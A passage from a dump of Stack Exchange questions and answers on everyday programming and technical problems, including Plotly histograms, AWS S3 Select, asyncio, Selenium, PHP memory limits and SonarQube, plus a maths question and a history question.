https:\/\/towardsdatascience.com\/histograms-with-plotly-express-complete-guide-d483656c5ad7\nComment: @vaasha How did my suggestion work out for you?\nComment: Does it have to be Plotly express? I don't think there are any parameters in Plotly express that allow you to add text, unless you want to add annotations, but then it seems like using a graph_object would be easier.\nComment: @Vaasha Thanks for the feedback! Would you consider marking my suggestion as the accepted answer? As you most likely know, if a better solution comes along you can always select a different accepted answer\nAnswer: The text_auto<\/code> parameter set to True<\/code> will do what you want.\nTaking your example code, this is what i get :\nfig = px.histogram(pd.DataFrame({\"A\":[1,1,1,2,2,3,3,3,4,4,4,5]}),x=\"A\", \ntext_auto=True)\nfig.show()\n<\/code>\nBeing a new member i cannot embed the screenshot yet, but here is a link.\nHistogram\nA bit late but hope this will help.\nComment: This worked when I updated from plotly 5.4 to 5.6. Thanks!\nComment: I had all my bars labeled with the number 1, when I added the `text_auto` parameter. Not sure why.\nAnswer: As far as I know, plotly histograms do not have a text attribute. It also turns out that it's complicated if at all possible to retrieve the applied x and y values and just throw them into appropriate annotations. Your best option seems to be to take care of the binning using numpy.histogram and the set up your figure using go.Bar<\/code>. The code snippet below will produce the following plot:\n\nComplete code:\nimport numpy as np\nimport plotly.express as px\nimport plotly.graph_objects as go\n\n# sample data\ndf = px.data.tips()\n\n# create bins\nbins = [0, 10, 20, 30, 40, 50]\ncounts, bins = np.histogram(df.total_bill, bins=bins)\n#bins2 = 0.5 * (bins1[:-1] + bins2[1:])\n\nfig = go.Figure(go.Bar(x=bins, y=counts))\nfig.data[0].text = counts\nfig.update_traces(textposition='inside', textfont_size=8)\nfig.update_layout(bargap=0)\n\nfig.update_traces(marker_color='blue', marker_line_color='blue',\n marker_line_width=1, opacity=0.4)\n\nfig.show()\n<\/code>\nAnswer: I had his same problem this morning while trying to plot a histogram of TDD percentages. 
Using plotly, I wanted to normalize (histnorm: 'percent') so I could see percentages of my monthly TDD values instead of the counts, and I found this solution simply by doing a print(tdd_hist).\nFirst, I printed the figure to the console and saw this output...\nFigure({\n'data': [{'alignmentgroup': 'True',\n          'bingroup': 'x',\n          'histnorm': 'percent',\n          'hovertemplate': 'Total Demand Distortion TDD %=%{x}
count=%{y}<\/extra>',\n 'legendgroup': '',\n 'marker': {'color': '#636efa'},\n 'name': '',\n 'offsetgroup': '',\n 'orientation': 'v',\n 'showlegend': False,\n 'type': 'histogram',\n 'x': array([0.67, 0.68, 0.68, ..., 2.41, 2.48, 2.01]),\n 'xaxis': 'x',\n 'yaxis': 'y'}],\n'layout': {'barmode': 'relative',\n 'legend': {'tracegroupgap': 0},\n 'template': '...',\n 'title': {'text': 'Percent Histogram of TDD%'},\n 'xaxis': {'anchor': 'y', 'domain': [0.0, 1.0], 'title': {'text': 'Total Demand Distortion TDD %'}},\n 'yaxis': {'anchor': 'x', 'domain': [0.0, 1.0], 'title': {'text': 'count'}, 'type': 'log'}}\n<\/code>\nNow I can clearly see that to change this, I do a\ntdd_hist.layout.yaxis.title.text = 'Percent'\n<\/code>\nAnd it works!\nComment: This just changes the title of the yaxis, and has nothing to do with the question asked\n","meta":{"source":"stackoverflow","title":"Plotly: How to add text labels to a histogram?","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to fix \"MissingHeaders\" Error while appending where clause with s3 select\n\nQuestion: I have a csv file in the format\nIDATE_TIMESTAMP,OPEN,HIGH,LOW,CLOSE,VOLUME\n1535535060,94.36,94.36,94.36,94.36,1\n1535535120,94.36,94.36,93.8,93.8,1\n1535535180,93.8,93.8,93.8,93.8,0\n1535535240,93.8,93.8,93.74,93.74,1\n1535535300,93.74,93.74,93.74,93.74,0\n1535535360,93.74,93.74,93.74,93.74,0\n1535535420,93.74,93.74,93.74,93.74,0\n1535535480,93.74,93.74,93.74,93.74,0\n1535535540,93.74,93.74,93.74,93.74,0\n.\n.\n.\n.\n<\/code>\nI have to and from timestamp which will filter out the data from the file and return the output. I am using python + boto3 for s3 select. \nfromTs = \"1535535480\"\ntoTs = \"1535535480\"\nquery = \"\"\"SELECT * FROM s3object s WHERE s.\"IDATE_TIMESTAMP\" >= \"%s\" AND s.\"IDATE_TIMESTAMP\" <= \"%s\" \"\"\"%(fromTs, toTs)\nrequest = client.select_object_content(\n Bucket=bucket,\n Key=filename,\n ExpressionType=\"SQL\",\n Expression=query,\n InputSerialization={\"CSV\":{\"FileHeaderInfo\":\"Use\", \"FieldDelimiter\":\",\", \"RecordDelimiter\":\"\\n\"}},\n OutputSerialization={\"CSV\":{}},\n )\n<\/code>\nbotocore.exceptions.ClientError: An error occurred (MissingHeaders) when calling the SelectObjectContent operation: Some headers in the query are missing from the file. Please check the file and try again.\nThis is error i am getting\nAnswer: I know this is a bit late and might not be the solution to your issue, but I was having a similar one.\nMy issue turned out to be that I was attempting to perform an S3 Select on an object with UTF-8-BOM encoding, rather than just UTF-8. 
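If you want to check whether that is what is happening in your case too, here is a rough sketch of the kind of test I did (the bucket and key names are placeholders, and boto3 is assumed to be configured already):\nimport boto3\n\ns3 = boto3.client('s3')\n# fetch only the first three bytes of the object and compare them to the UTF-8 BOM\nhead = s3.get_object(Bucket='my-bucket', Key='my-file.csv', Range='bytes=0-2')['Body'].read()\nprint(head == b'\\xef\\xbb\\xbf')  # True means the file starts with a BOM\n<\/code>\n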
It turns out that the 3 byte BOM header was being interpreted as part of the first field in the CSV object, essentially corrupting the first column name.\nAs a result, rather than \"IDATE_TIMESTAMP\", the first column would be seen by the S3 Select call as \"xxxIDATE_TIMESTAMP\", causing an error when your expected column is \"missing\".\nAnswer: The timestamp columns need to be casted as int.\nThe following query:\nfromTs = 1535535480\ntoTs = 1535535480\n<\/code>\nSELECT * FROM s3object s \nwhere cast(s.IDATE_TIMESTAMP as int) >= {} \nAND cast(s.IDATE_TIMESTAMP as int) <= {}\".format(fromTs, toTs) \n<\/code>\nwould work in python 3.\n","meta":{"source":"stackoverflow","title":"How to fix \"MissingHeaders\" Error while appending where clause with s3 select","dup_signals":{}},"subset":"stackexchange"} +{"text":"Elliptic curve representation\n\nQuestion: According to this page, Edward's curve point doubling can be represented in a different way by assuming $c=1$ and $d = r^2$.\nIt then says we can represent $x y$ as $Y Z$ satisfying $r\\cdot y = \\frac Y Z$\nI am a bit confused. How would I then calculate the $x$ coordinate? For example, they have provided the following explicit formula:\nYY = Y12\nZZ = r*Z12\nV = s*(ZZ-YY)2\nW = (ZZ+YY)2\nY3 = W-V\nZ3 = W+V\n<\/code>\nSo after obtaining $Y_3$ and $Z_3$, how would I revert back to affine coordinates and calculate $x$ and $y$?\nAnswer: When $c=1$ and $d = r^2$, an Edwards curve $x^2+y^2=c^2(1+dx^2y^2)$ becomes $$x^2+y^2=1+r^2x^2y^2 \\iff x^2(1-r^2 y^2) = 1 - y^2$$\nWith the $(Y,Z)$ notation, a point $P = (x,y)$ is represented as a pair $(Y:Z)$ satisfying $ry = Y\/Z$. Note that this representation does not allow to distinguish $P = (x,y)$ from $-P = (-x,y)$. \nGiven a pair $(Y:Z)$, one can recover $\\pm P = (\\pm x, y)$ where $y = Y\/(rZ)$ and $\\pm x$ is the square root of $(1-y^2)\/(1-r^2y^2)$.\nComment: I don't think this is the simplest way. For Montgomery or Brier-Joye ladders there is a way to compute the $y$ coordinate given the addition formula and some equations that holds (which for ladders is the fact that the difference of the two internal points is the base point). I imagine the same could apply here to avoid the heavy square root.\nComment: @Ruggero: This is another setting. Define $(x_k,y_k) = [k]P$. Using Montgomery-like ladders, you'll get $(Y_k:Z_k)$ and $(Y_{k+1}:Z_{k+1})$. It is then possible to recover $(x_k,y_k)$ without computing a square root but this requires the knowledge of $P=(x,y)$.\nComment: Are you saying that ponzi34 lacked the original $x$ coordinate ? I would doubt that.\n","meta":{"source":"crypto.stackexchange","title":"Elliptic curve representation","dup_signals":{}},"subset":"stackexchange"} +{"text":"Fetch data from IndexedDB in Angular2\n\nQuestion: Anyone knows about Angular2 IndexedDb.Please help me.\nI have a json response like this.\n{\n \"response\": {\n \"data\": {\n \"name\": \"ABC\",\n \"Id\": \"1234\",\n \"address\": \"adthhyrr\" \n }\n }\n}\n<\/code>\nI am saving this response to IndexedDB. 
But i am facing problem while fetching data from indexedDB.\nI am following this example.https:\/\/github.com\/robisim74\/angular2indexedDB\nIn the service file am doing like this to get data.\n getAllData(): any { \n\n return new Promise(resolve => \n {\n this.indexedDB.openDBAsync(\"Angular2IndexedDB\", 1).forEach(\n\n (readyState: string) => {\n\n console.log('IndexedDB service: opening db: ' + readyState);\n\n }, null\n\n ).then(\n\n () => {\n\n \/\/ Gets all records from \"Table\".\n this.indexedDB.getAllRecordsAsync(\"Login\").forEach(\n\n \/\/ Next.\n (record: Todo) => {\n if (record != null) {\n this.indexeddb_data = JSON.parse(record.description);\n console.log('data'+this.indexeddb_data);\n \/\/here am getting data in this.indexeddb_data.In console i am getting.\n return this.indexeddb_data;\n }\n }, null\n\n ).then(() => {\n\n resolve(true);\n return this.indexeddb_data;\n\n });\n\n });\n });\n }\n<\/code>\nBut it is not returning anything.Can anyone please me how to do this.Or any other method is there to fetch data from IndexedDB?\nAnswer: Where you're referencing \"this.indexedDB\", the author of the linked code actually has functions on his service object that handle the \"openDBAsync\" functionality and the getAllRecordsAsync functionality. They're not functions on the indexedDB object. So, if you've declared functions on your service like he has or are importing them from some other service, then you should reference them in the correct way. If they're declared directly on the service class, then just say \"this.openDBAsync('some_name', 1)\" instead of how you've done it. And if you're importing these functions from some other file, then just call them directly like this \"openDBAsync('some_name', 1)\".\nAlso, take a look at the indexedDB api to make sure you have the available methods down, so you don't get tripped up. https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/API\/IndexedDB_API\n","meta":{"source":"stackoverflow","title":"Fetch data from IndexedDB in Angular2","dup_signals":{}},"subset":"stackexchange"} +{"text":"Running asynchronous code synchronously in separate thread\n\nQuestion: I'm using Django Channels to support websockets and am using their concept of a group to broadcast messages to multiple consumers in the same group. In order to send messages outside of a consumer, you need to call asynchronuous methods in otherwise synchronous code. Unfortunately, this is presenting problems when testing. \nI began by using loop.run_until_complete<\/code>:\nloop = asyncio.get_event_loop()\nloop.run_until_complete(asyncio.ensure_future(channel_layer.group_send(group_name, {'text': json.dumps(message),\n 'type': 'receive_group_json'}),\n loop=loop))\n<\/code>\nThen the stacktrace read that the thread did not have an event loop: RuntimeError: There is no current event loop in thread 'Thread-1'.<\/code>. To solve this, I added:\nloop = asyncio.new_event_loop()\nasyncio.set_event_loop(loop)\nloop.run_until_complete(asyncio.ensure_future(channel_layer.group_send(group_name, {'text': json.dumps(message),\n 'type': 'receive_group_json'}),\n loop=loop))\n<\/code>\nAnd now the stacktrace is reading the RuntimeError: Event loop is closed<\/code>, although if I add print statements loop.is_closed()<\/code> prints False<\/code>.\nFor context, I'm using Django 2.0, Channels 2, and a redis backend.\nUpdate: I tried running this in a Python interpreter (outside of py.test to remove moving variables). 
When I ran the second code block, I did not get an Event loop is closed<\/code> error (that may be due to something on Pytest's end whether its timeouts, etc). But, I did not receive the group message in my client. I did, however, see a print statement:\n({ result=None>}, set())\n<\/code>\nUpdate 2: After flushing redis, I added a fixture in py.test to flush it for every function as well as a session-scoped event loop. This time yielding yet another print from RedisChannelLayer:\n({ exception=RuntimeError('Task > got Future attached to a different loop',)>}, set())\n<\/code>\nAnswer: If channel_layer<\/code> expects to reside in its own event loop in another thread, you will need to get a hold of that event loop object. Once you have it, you can submit coroutines to it and synchronize with your thread, like this:\ndef wait_for_coro(coro, loop):\n # submit coroutine to the event loop in the other thread\n # and wait for it to complete\n future = asyncio.run_coroutine_threadsafe(coro, loop)\n return future.wait()\n\nwait_for_coro(channel_layer.group_send(group_name, ...), channel_loop)\n<\/code>\nComment: What's the standard practice for passing the event loop between threads? Do I need to pass the event loop as an argument into the worker thread? Or is there a call in the daphne or async lib?\nComment: @williamrfry Since the event loop is an object like any other, passing `asyncio.get_event_loop()` an argument to the worker thread is perfectly fine. The only thing to remember is that you're not allowed to *do* anything with that event loop in the worker thread (e.g. submit tasks or query its state), except through `asyncio.run_coroutine_threadsafe`.\nAnswer: By default, only the main thread gets an event loop and calling get_event_loop<\/code> in other threads will fail. \nIf you need an event loop in another thread -- such as a thread handling an HTTP or WebSockets request -- you need to make it yourself with new_event_loop<\/code>. After that you can use set_event_loop<\/code> and future get_event_loop<\/code> calls will work. I do this:\n# get or create an event loop for the current thread\ndef get_thread_event_loop():\n try:\n loop = asyncio.get_event_loop() # gets previously set event loop, if possible\n except RuntimeError:\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n return loop\n<\/code>\nMore here.\n","meta":{"source":"stackoverflow","title":"Running asynchronous code synchronously in separate thread","dup_signals":{}},"subset":"stackexchange"} +{"text":"How can we pass in an ExpectedConditions as a parameter to wait.until in Selenium Java?\n\nQuestion: I'm finding trouble passing in an ExpectedConditions<\/code> as a parameter in a method to wait.until()<\/code>. The wait.until()<\/code> expects a function to be passed in. I am relatively new to Java, and would appreciate the assistance.\nOffending code:\npublic void waitUntil(WebElement element, long seconds, String errorMessage, ExpectedConditions expectedConditions) {\n if (seconds == 0 || errorMessage.isEmpty()) throw new IllegalArgumentException();\n WebDriverWait wait = new WebDriverWait(driver, Duration.ofSeconds(seconds));\n wait.withMessage(errorMessage);\n \/\/ this throws a compiler error.\n wait.until(expectedConditions);\n}\n<\/code>\nwait.until()<\/code> expects a function to be passed into it, which looks like ExpectedConditions.urlToBe(\"http:\/\/www.test.com\")<\/code>.\nI am trying to make a method that could be called where any ExpectedCondition i.e. urlToBe, alertIsPresent etc.. 
could be passed in.\nThank you.\nComment: Just leave it as `?` . It is called wildcards: https:\/\/docs.oracle.com\/javase\/tutorial\/java\/generics\/wildcards.html\nComment: What does the compiler error says?\nComment: ```Required type: Function \nProvided: ExpectedConditions\n\nreason: no instance(s) of type variable(s) V exist so that ExpectedConditions conforms to Function```\nComment: What if you change the 4th parameter to: `ExpectedCondition expectedConditions`?\nComment: What type should the be?\nComment: I see, the compiler error has gone. Testing it now, will report back.\nAnswer: (WebElement element, long seconds, String errorMessage, ExpectedConditions expectedConditions)\n<\/code>\nIn first place, the type of expectedConditions<\/code> is wrong.\nYou declared it as ExpectedConditions<\/code>, which represents the util class.\nYou actually want ExpectedCondition<\/code>, the type which all methods from ExpectedConditions<\/code> returns.\nBut just changing it to ExpectedCondition<\/code> is not enough. Because you will receive an warning about Raw type<\/code>, because ExpectedCondition<\/code> is a generic class.\nSo you have to declare the type parameter of class, and because you want to include everything, you use wildcard ?<\/code>\nIn the final, the parameter should be ExpectedCondition expectedConditions<\/code>\nAnswer: WebDriverWait has a constructor that is overloaded to take long as a second args. You do not need to use Duration.ofSeconds(seconds)<\/code>\nAlso,\nThe method until(Function) in the type FluentWait is not applicable for the arguments (ExpectedConditions)\n<\/code>\nFix :\nYou should use expectedConditions with one the conjunction like\n\nelementToBeClickable\nvisibilityOfElement\n\nand so on..\nCode :\npublic void waitUntil(WebElement element, long seconds, String errorMessage, ExpectedConditions expectedConditions) {\n if (seconds == 0 || errorMessage.isEmpty()) throw new IllegalArgumentException();\n WebDriverWait wait = new WebDriverWait(driver, seconds);\n wait.withMessage(errorMessage);\n WebElement elemenet = wait.until(expectedConditions.elementToBeClickable(By.xpath(\"\/\/some xpath\")));\n }\n<\/code>\nInternal overloaded method :\n *\/\n public WebDriverWait(WebDriver driver, long timeOutInSeconds) {\n this(\n driver,\n java.time.Clock.systemDefaultZone(),\n Sleeper.SYSTEM_SLEEPER,\n timeOutInSeconds,\n DEFAULT_SLEEP_TIMEOUT);\n }\n<\/code>\nComment: The thing is, using ```long``` or ```int``` only is now deprecated, it has the @Deprecated annotation on it. Selenium authors want us to use the ```Duration.ofSeconds()``` as an argument.\nComment: @SilentKay : Which version you are on ?\nComment: Selenium 4.0.0.\n\nJust to add -> i'm aware you can use ```ExpectedConditions.urlToBe(url)``` and just pass the ```url``` into it. But that means i'll have to create a separate method for each condition. Whereas, I would rather prefer it to be generic, so I can pass in an ExpectedCondition object into the method, with any condition as the caller sees fit.\nAnswer: I don't see anythin wrong in your code block. However you need to ensure a couple of things as follows:\n\nWhhile using ExpectedConditions you have to make the following import:\nimport org.openqa.selenium.support.ui.ExpectedConditions;\n<\/code>\n\nAs you are using Selenium 4.0.0 you need to use guava-31.0.1-jre.jar<\/code>\nComment: Yes, I removed it for brevity reasons. 
But it is already there.\nComment: I'm not sure what \"guava\" has to do with passing a static method into a method to be called upon?\nComment: Cross check the guava version.\nComment: Seems you got a working and an Accepted answer. So I'll skip the explanation. Good Luck\n","meta":{"source":"stackoverflow","title":"How can we pass in an ExpectedConditions as a parameter to wait.until in Selenium Java?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Formula returns 'int' object is not iterable\n\nQuestion: Here is a code that gives an error:\nfrom math import sqrt \n\ndef normal(vector):\n sum = 0\n for i in vector:\n sum = sum + (i**2)\n norm = sqrt(sum)\n return round(norm, 4)\n\ndef innerproduct(vector_x, vector_y):\n sum = 0 \n for i in vector_x:\n for j in vector_y:\n sum = sum + (i*j)\n inner_product = sum\n return inner_product\n\ndef distance(vector_x, vector_y):\n distance = 0\n for i in vector_x:\n for j in vector_y:\n dist = normal(i)**2 + normal(j)**2 - (2*(innerproduct(i,j)))\n return sqrt(dist)\n<\/code>\nthe first two functions are working fine but the third one returns TypeError: 'int' object is not iterable.\nComment: Paste the full error message. And the code which calls the 3rd method.\nComment: Maybe you are calling `distance` with a int in argument, so there is an error in the for loop ?\nComment: TypeError (most recent call last)\n----> 1 print(\"distance(vector_x, vector_y):\", distance(vector_x, vector_y))\n in distance(vector_x, vector_y)\n 20 for i in vector_x:\n 21 for j in vector_y:\n---> 22 dist = int(normal(i)**2) + int(normal(j)**2) - (2*(innerproduct(i,j)))\n 23 return sqrt(dist)\nin normal(vector)\n 3 def normal(vector):\n 4 sum = 0\n----> 5 for i in vector:\n 6 sum = sum + (i**2)\n 7 norm = sqrt(sum)\n\nTypeError: 'int' object is not iterable\nAnswer: The error I got is :\nTraceback (most recent call last):\n File \"t.py\", line 25, in \n print(distance([1,2],[5,6]))\n File \"t.py\", line 22, in distance\n dist = normal(i)**2 + normal(j)**2 - (2*(innerproduct(i,j)))\n File \"t.py\", line 5, in normal\n for i in vector:\nTypeError: 'int' object is not iterable\n<\/code>\nBecause in your function normal<\/code>, you do a for loop on a int (vector<\/code>).\nComment: I tried to add in range(vector) to avoid this error, but it didn't work.\nComment: your vector variable is a int, you can't iterate on it, and you can't use `range` on it either. In your function `distance`, when you are calling `normal`, you put `i` in argument, it's a int from `vector_x`\nComment: so what is the possible solution?\nComment: Put vector_x instead of i when calling normal maybe, but I don't know about your formula\n","meta":{"source":"stackoverflow","title":"Formula returns 'int' object is not iterable","dup_signals":{}},"subset":"stackexchange"} +{"text":"Adding an image to a shape\n\nQuestion: So i'm learning to create a java game on eclipse. I learned adding shapes and such. I also learned how to paint the shapes (change the colours) I was wondering how to add an image to the shape. This is the code for painting the rectangle.\npublic void paintColumn(Graphics g, Rectangle column)\n {\n g.setColor(Color.blue.darker());\n g.fillRect(column.x, column.y, column.width, column.height);\n }\n<\/code>\nComment: `g.drawImage`? What do you mean by \"add to shape\"? Do you want to clip the image so it's the same shape as the shape? 
Or just draw the image within the shape?\nComment: I want the image to be inside the shape, but the shape having the same hit box.\nComment: You want to draw the same around the image then?\nComment: yeah that is what I want\nAnswer: Start by having a look at Reading\/Loading an Image for details about how to load a image, also, have a look at 2D Graphics for more details about 2D Graphics API.\nBasically, you load the image, you draw it and then draw the shape around it.\n\n Graphics2D g2d = (Graphics2D) g.create();\n int x = (getWidth() - img.getWidth()) \/ 2;\n int y = (getHeight() - img.getHeight()) \/ 2;\n g2d.drawImage(img, x, y, this);\n g2d.setColor(Color.RED);\n g2d.drawRect(x, y, img.getWidth(), img.getHeight());\n g2d.dispose();\n<\/code>\nNow, this just draws the rectangle over the image, if you want to, somehow \"frame\" the image instead, you could fill the rectangle, making it larger then the image, but you'd have to fill first, then draw the image\n\n Graphics2D g2d = (Graphics2D) g.create();\n int x = (getWidth() - img.getWidth()) \/ 2;\n int y = (getHeight() - img.getHeight()) \/ 2;\n g2d.setColor(Color.RED);\n g2d.fillRect(x - 10, y - 10, img.getWidth() + 20, img.getHeight() + 20);\n g2d.drawImage(img, x, y, this);\n g2d.dispose();\n<\/code>\nAnswer: Simply create a BufferedImage object:\nBufferedImage image = ImageIO.read(filename);\n<\/code>\nThen instead of doing g.drawShape do:\ng.drawImage(image, [starting x], [starting y], [image width], [image height], [image observer]);\n<\/code>\nIn your case, you probably won't need an image observer, so you can just put null<\/code> in that spot.\nThen what would be easiest is to just draw your rectangle on top of the image. Even though the image will not actually be \"inside\" the the rectangle, the layered effect will make it look as if it is. You can use drawRect<\/code> instead of fillRect<\/code> so you just get a border around your image.\nTo ensure that your rectangle ends up on top of the image, and doesn't get covered since the image is the same size, make sure to put the drawRect line after the drawImage.\ng.drawRect([starting x], [starting y], [width], [height]);\n<\/code>\nCheck out these Graphics Java Docs for more information on drawing images.\n","meta":{"source":"stackoverflow","title":"Adding an image to a shape","dup_signals":{}},"subset":"stackexchange"} +{"text":"Why is Mathematica unable to solve this integral equation?\n\nQuestion: How to solve the following integral equation in Mathematica?\neqn = y[x, z] == z + x*Integrate[y[t, v], {t, 0, 1}, {v, 0, 1}]\nsol = DSolveValue[eqn, y[x, z], {x, z}]\n<\/code>\nWhat is the problem?\nMathematica usually gives me answers like that while solving things that look difficult. I can solve simple problems. Difficult problems are why I need a software. Thank you in advance.\nComment: Please post your code, not a picture of it, so that readers can try to help you without having to transcribe it. Also, do yo9u have reason to believe that a symbolic solution actually exist?\nComment: @bbgodfrey I do not believe. I am seeing that it is not working. If it doesn't exist, why doesn't it give an error? or say \"it doesn't exist\"? If I knew the answer I wouldn't try in the first place.\nComment: In fact, Mathematica almost always returns unevaluated, when it cannot solve a problem. I agree that it should provide an explanation, but it does not. By the way, a solution to your second equation does exist, even thought Mathematica cannot find it. 
It is `x + z` .\nComment: @bbgodfrey Thank you so much. The actual equation I am trying to solve is more complicated than this but it has the same shape. I would be pleased if you could recommend me another software\/application.\nComment: Please post your code instead of picture.\nAnswer: Mathematica can solve your equation, but it requires some understanding of mathematics and human intervention. This is always the case for nontrivial problems, isn't it?\nAdditive solution was demonstrated by @bbgodfrey. But there is another multiplicative one. Separate variables as follows\n$$y(x,z)=g(x) h(z),$$\nand set\n$$G=\\int_0^1 g(x) dx.$$\nNow your equation reads after integrating it $\\int_0^1 dx\\ldots$\n$$\nG h(z)=z+\\frac{G}{2} \\int_0^1\\! h(v)\\, dv.\n$$\nThis equation can be solved with MA\neqn = G* h[z] == z + 1\/2* G*Integrate[h[v], {v, 0, 1}]\nDSolveValue[eqn, h[z], z]\n<\/code>\n$$h(z)=\\frac{2 z+1}{2 G}.$$\nThe full solution therefore reads\n$$y(x,z)=\\frac{(2 z+1)g(x)}{2 G},$$\nwhere $g(x)$ is arbitrary function on the $[0,1]$ interval such that $G=\\int_0^1 g(x) dx\\neq0$.\n","meta":{"source":"mathematica.stackexchange","title":"Why is Mathematica unable to solve this integral equation?","dup_signals":{}},"subset":"stackexchange"} +{"text":"PHP Error - keep getting \"Out of memory error\"\n\nQuestion: I kept getting this error on one of the site Im working on\n\nMessage Out of memory (allocated 2097152) (tried to allocate 20480 bytes)\n\nand the thing is we already set the memory limit to 512MB, and seems weird that it says allocated 2097152 which is like only 2MB?\nThis site is running in wordpress with woocommerce, and the even woocommerce status says the memory limit is 512MB.\nCan anybody explain whats going on?\nServer is running on NGINX + PHP-FPM\nComment: It sounds like you might have an infinite loop somewhere. Please show us the code where the error message is thrown, or we won't have a clue what's going on.\nComment: Don't you see a path and a line number following the error?\nComment: Where are you getting this error? Are you doing anything special and getting this error.\nComment: Its throwing everywhere even in native wp files .e.g\n```Fatal Error\nLine 1333\nMessage Out of memory (allocated 6291456) (tried to allocate 114688 bytes)\nFile \/..\/..\/...\/wp-admin\/includes\/class-wp-list-table.php```\nComment: I could list 10-30 files showing on the log file from plugin or theme that produces this type of error.\nComment: my question here is why it says \"Out of memory (allocated 2097152)\" isn't that only 2MB? where as my memory limit is 512MB\nAnswer: Try set upload_max_filesize, post_max_size , max_file_uploads<\/code> and memory_limit<\/code> in php.ini<\/code> and then restart your Apache server. 
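(Note that the question says the server runs NGINX + PHP-FPM rather than Apache, so it is the php-fpm service that needs restarting, and it is the php.ini loaded by PHP-FPM that matters.) As a quick sanity check - a minimal sketch, to be dropped temporarily into any page and removed afterwards - you can print what the running PHP actually sees:\n<?php\n\/\/ shows the effective limit and which php.ini file was loaded\nvar_dump(ini_get('memory_limit'));\nvar_dump(php_ini_loaded_file());\n<\/code>\n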
If it did not work, try to set the mentioned parameters to right on top of your code.\nBest way to increase memory limit in PHP or WordPress.\n\nVia php.ini file\n\nmemory_limit 2048M\npost_max_size 200M\nupload_max_filesize 20M\nmax_file_uploads 20\n<\/code>\n\nVia PHP script\n\nini_set('memory_limit','2048M');\nini_set('post_max_size','200M');\nini_set('upload_max_filesize','20M');\nini_set('max_file_uploads','20');\n<\/code>\n\nVia wp_config.php file in WordPress\n\ndefine('WP_MEMORY_LIMIT', '2048M');\n<\/code>\n\nVia htaccess\n\nphp_value memory_limit 256M\nphp_value post_max_size 200M\nphp_value upload_max_filesize 20M\nphp_value max_file_uploads 20\n<\/code>\nComment: if you read my question, I mention its running NGINX + PHP-FPM\nComment: Can you please check free memeory on server please? Try this command to check `free -m` and let me know\nComment: You can also contact server provider to solve the issue related to server. They have issue solutions. They will suggest good things too.\nAnswer: In wp-config file Update the memory limit according to your need \ndefine('WP_MEMORY_LIMIT', '256m');\ndefine('WP_MAX_MEMORY_LIMIT', '512m');\n<\/code>\n","meta":{"source":"stackoverflow","title":"PHP Error - keep getting \"Out of memory error\"","dup_signals":{}},"subset":"stackexchange"} +{"text":"Analyse TypeScript SonarQube in Maven project\n\nQuestion: I'll try to use the SonarQube SonarTS plugin to analyse TypeScript files in a project of mine.\nIt contains a submodule that contains some images, some xmls, and a couple of .ts-files. I have installed SonarTS ( https:\/\/docs.sonarqube.org\/display\/PLUG\/SonarTS ) in SonarQube. The project uses typescript 2.4.2 as a devDependency and is build with Node 6.13.1.\nWhen I call mvn sonar:sonar -Dsonar.branch=<\/code> (I know sonar.branch is deprecated, I'll fix soon :)), eventually the sum-module is scanned and this is the log:\n[INFO] ------------- Scan MyProject\n[INFO] Base dir: \/home\/jenkins\/workspace\/my-project\/my-project-config-model\n[INFO] Working dir: \/home\/jenkins\/workspace\/my-project\/my-project-config-model\/target\/sonar\n[INFO] Source paths: pom.xml\n[INFO] Source encoding: UTF-8, default locale: en_US\n[INFO] Index files\n[INFO] 1 file indexed\n[INFO] Quality profile for xml: Sonar way\n[INFO] Sensor Embedded CSS Analyzer Sensor [css]\n[INFO] 0 source files to be analyzed\n[INFO] Sensor Embedded CSS Analyzer Sensor [css] (done) | time=1ms\n[INFO] Sensor SonarJavaXmlFileSensor [java]\n[INFO] 0\/0 source files have been analyzed\n[INFO] 1 source files to be analyzed\n[INFO] Sensor SonarJavaXmlFileSensor [java] (done) | time=31ms\n[INFO] 1\/1 source files have been analyzed\n[INFO] Sensor XML Sensor [xml]\n[INFO] Sensor XML Sensor [xml] (done) | time=8ms\n[INFO] SCM provider for this project is: git\n[INFO] 1 files to be analyzed\n[INFO] 0\/1 files analyzed\n<\/code>\nAnd the only file that is scanned is the pom.xml\nCould it have something to do with the structure of the sub-module? The xmls and ts files are not at src\/main\/{ts|resources}<\/code>, but src\/models<\/code> and src\/scripts<\/code>.\nThanks in advance!\nAnswer: I guess you need to change the sonar.sources<\/code> parameter to include your source folders (something like sonar.sources=src\/main\/java,src\/models,src\/scripts<\/code> should work).\nYou can find more about analysis parameters here, and more about the way to configure the maven scanner here.\nComment: Thank you very much! 
Have seen that in some examples, but haven't found the info, that if empty the default maven values are used. Thanks!\n","meta":{"source":"stackoverflow","title":"Analyse TypeScript SonarQube in Maven project","dup_signals":{}},"subset":"stackexchange"} +{"text":"ubuntu server does not function in gui mode\n\nQuestion: Prior to downloading the server- ubuntu desktop. I verified connectivity. I see a CD\/ROM on the E: drive. this is new. I go by the recommended procedure of VHD in SCSI and don't know where to go to CD\/ROM, scsi, ide, nvme? really it is like rocket science.\nI installed server before and it was a beauty with GUI. I had to change my SSD to bigger one on the computer. I installed windows server, debian package, REHL, and even ubuntu desktop. But server does not give me connection to the network. It is just a morroon shell that is dead.\nComment: yes, gui on server. The Ubuntu Gui desktop is what I want. release is 18.04.2. I go to -sudo apt install tasksel, then click on ubuntu desktop, ok, then sudo reboot. once there, I see a blank shell moroon color, just like the desktop. no lights, nothing. just dead\nComment: i already installed kali and the ubuntu desktop and had no problems, installed vmware tools that makes it just like my windows 10 experience. But the server installation is fine all the way to the point where it leads off to the GUI. Then goes dead. I had connectivity and could do everything pretty much in the command line.\nAnswer: sudo apt install --reinstall ubuntu-desktop gnome-shell\n<\/code>\nPackage name has changed since 17.10 and by the way a server has no gui.\n","meta":{"source":"askubuntu","title":"ubuntu server does not function in gui mode","dup_signals":{}},"subset":"stackexchange"} +{"text":"How did a criminal trial in the Soviet Union work after World War 2?\n\nQuestion: There are many historical accounts of \"trials\" in the Soviet Union. However, they tend to center around trials which are political trials. For example, a government agent accused of treason.\nHow did a criminal trial in the Soviet Union work? Specifically I am interested in the time immediately after World War 2.\nComment: You might need to be more specific timewise. The period 'immediately after' WW2 is still under Stalin, and it seems that *all trials* were political trials. Stealing a handful of grain could make you an enemy of the state.\nComment: @user2448131 Maybe that is the answer in itself. You could submit an answer about how even the smallest offenses in society were elevated to the level of severe crimes against the state apparatus.\nComment: [\u0414\u0438\u043d\u0430 \u041a\u0430\u043c\u0438\u043d\u0441\u043a\u0430\u044f 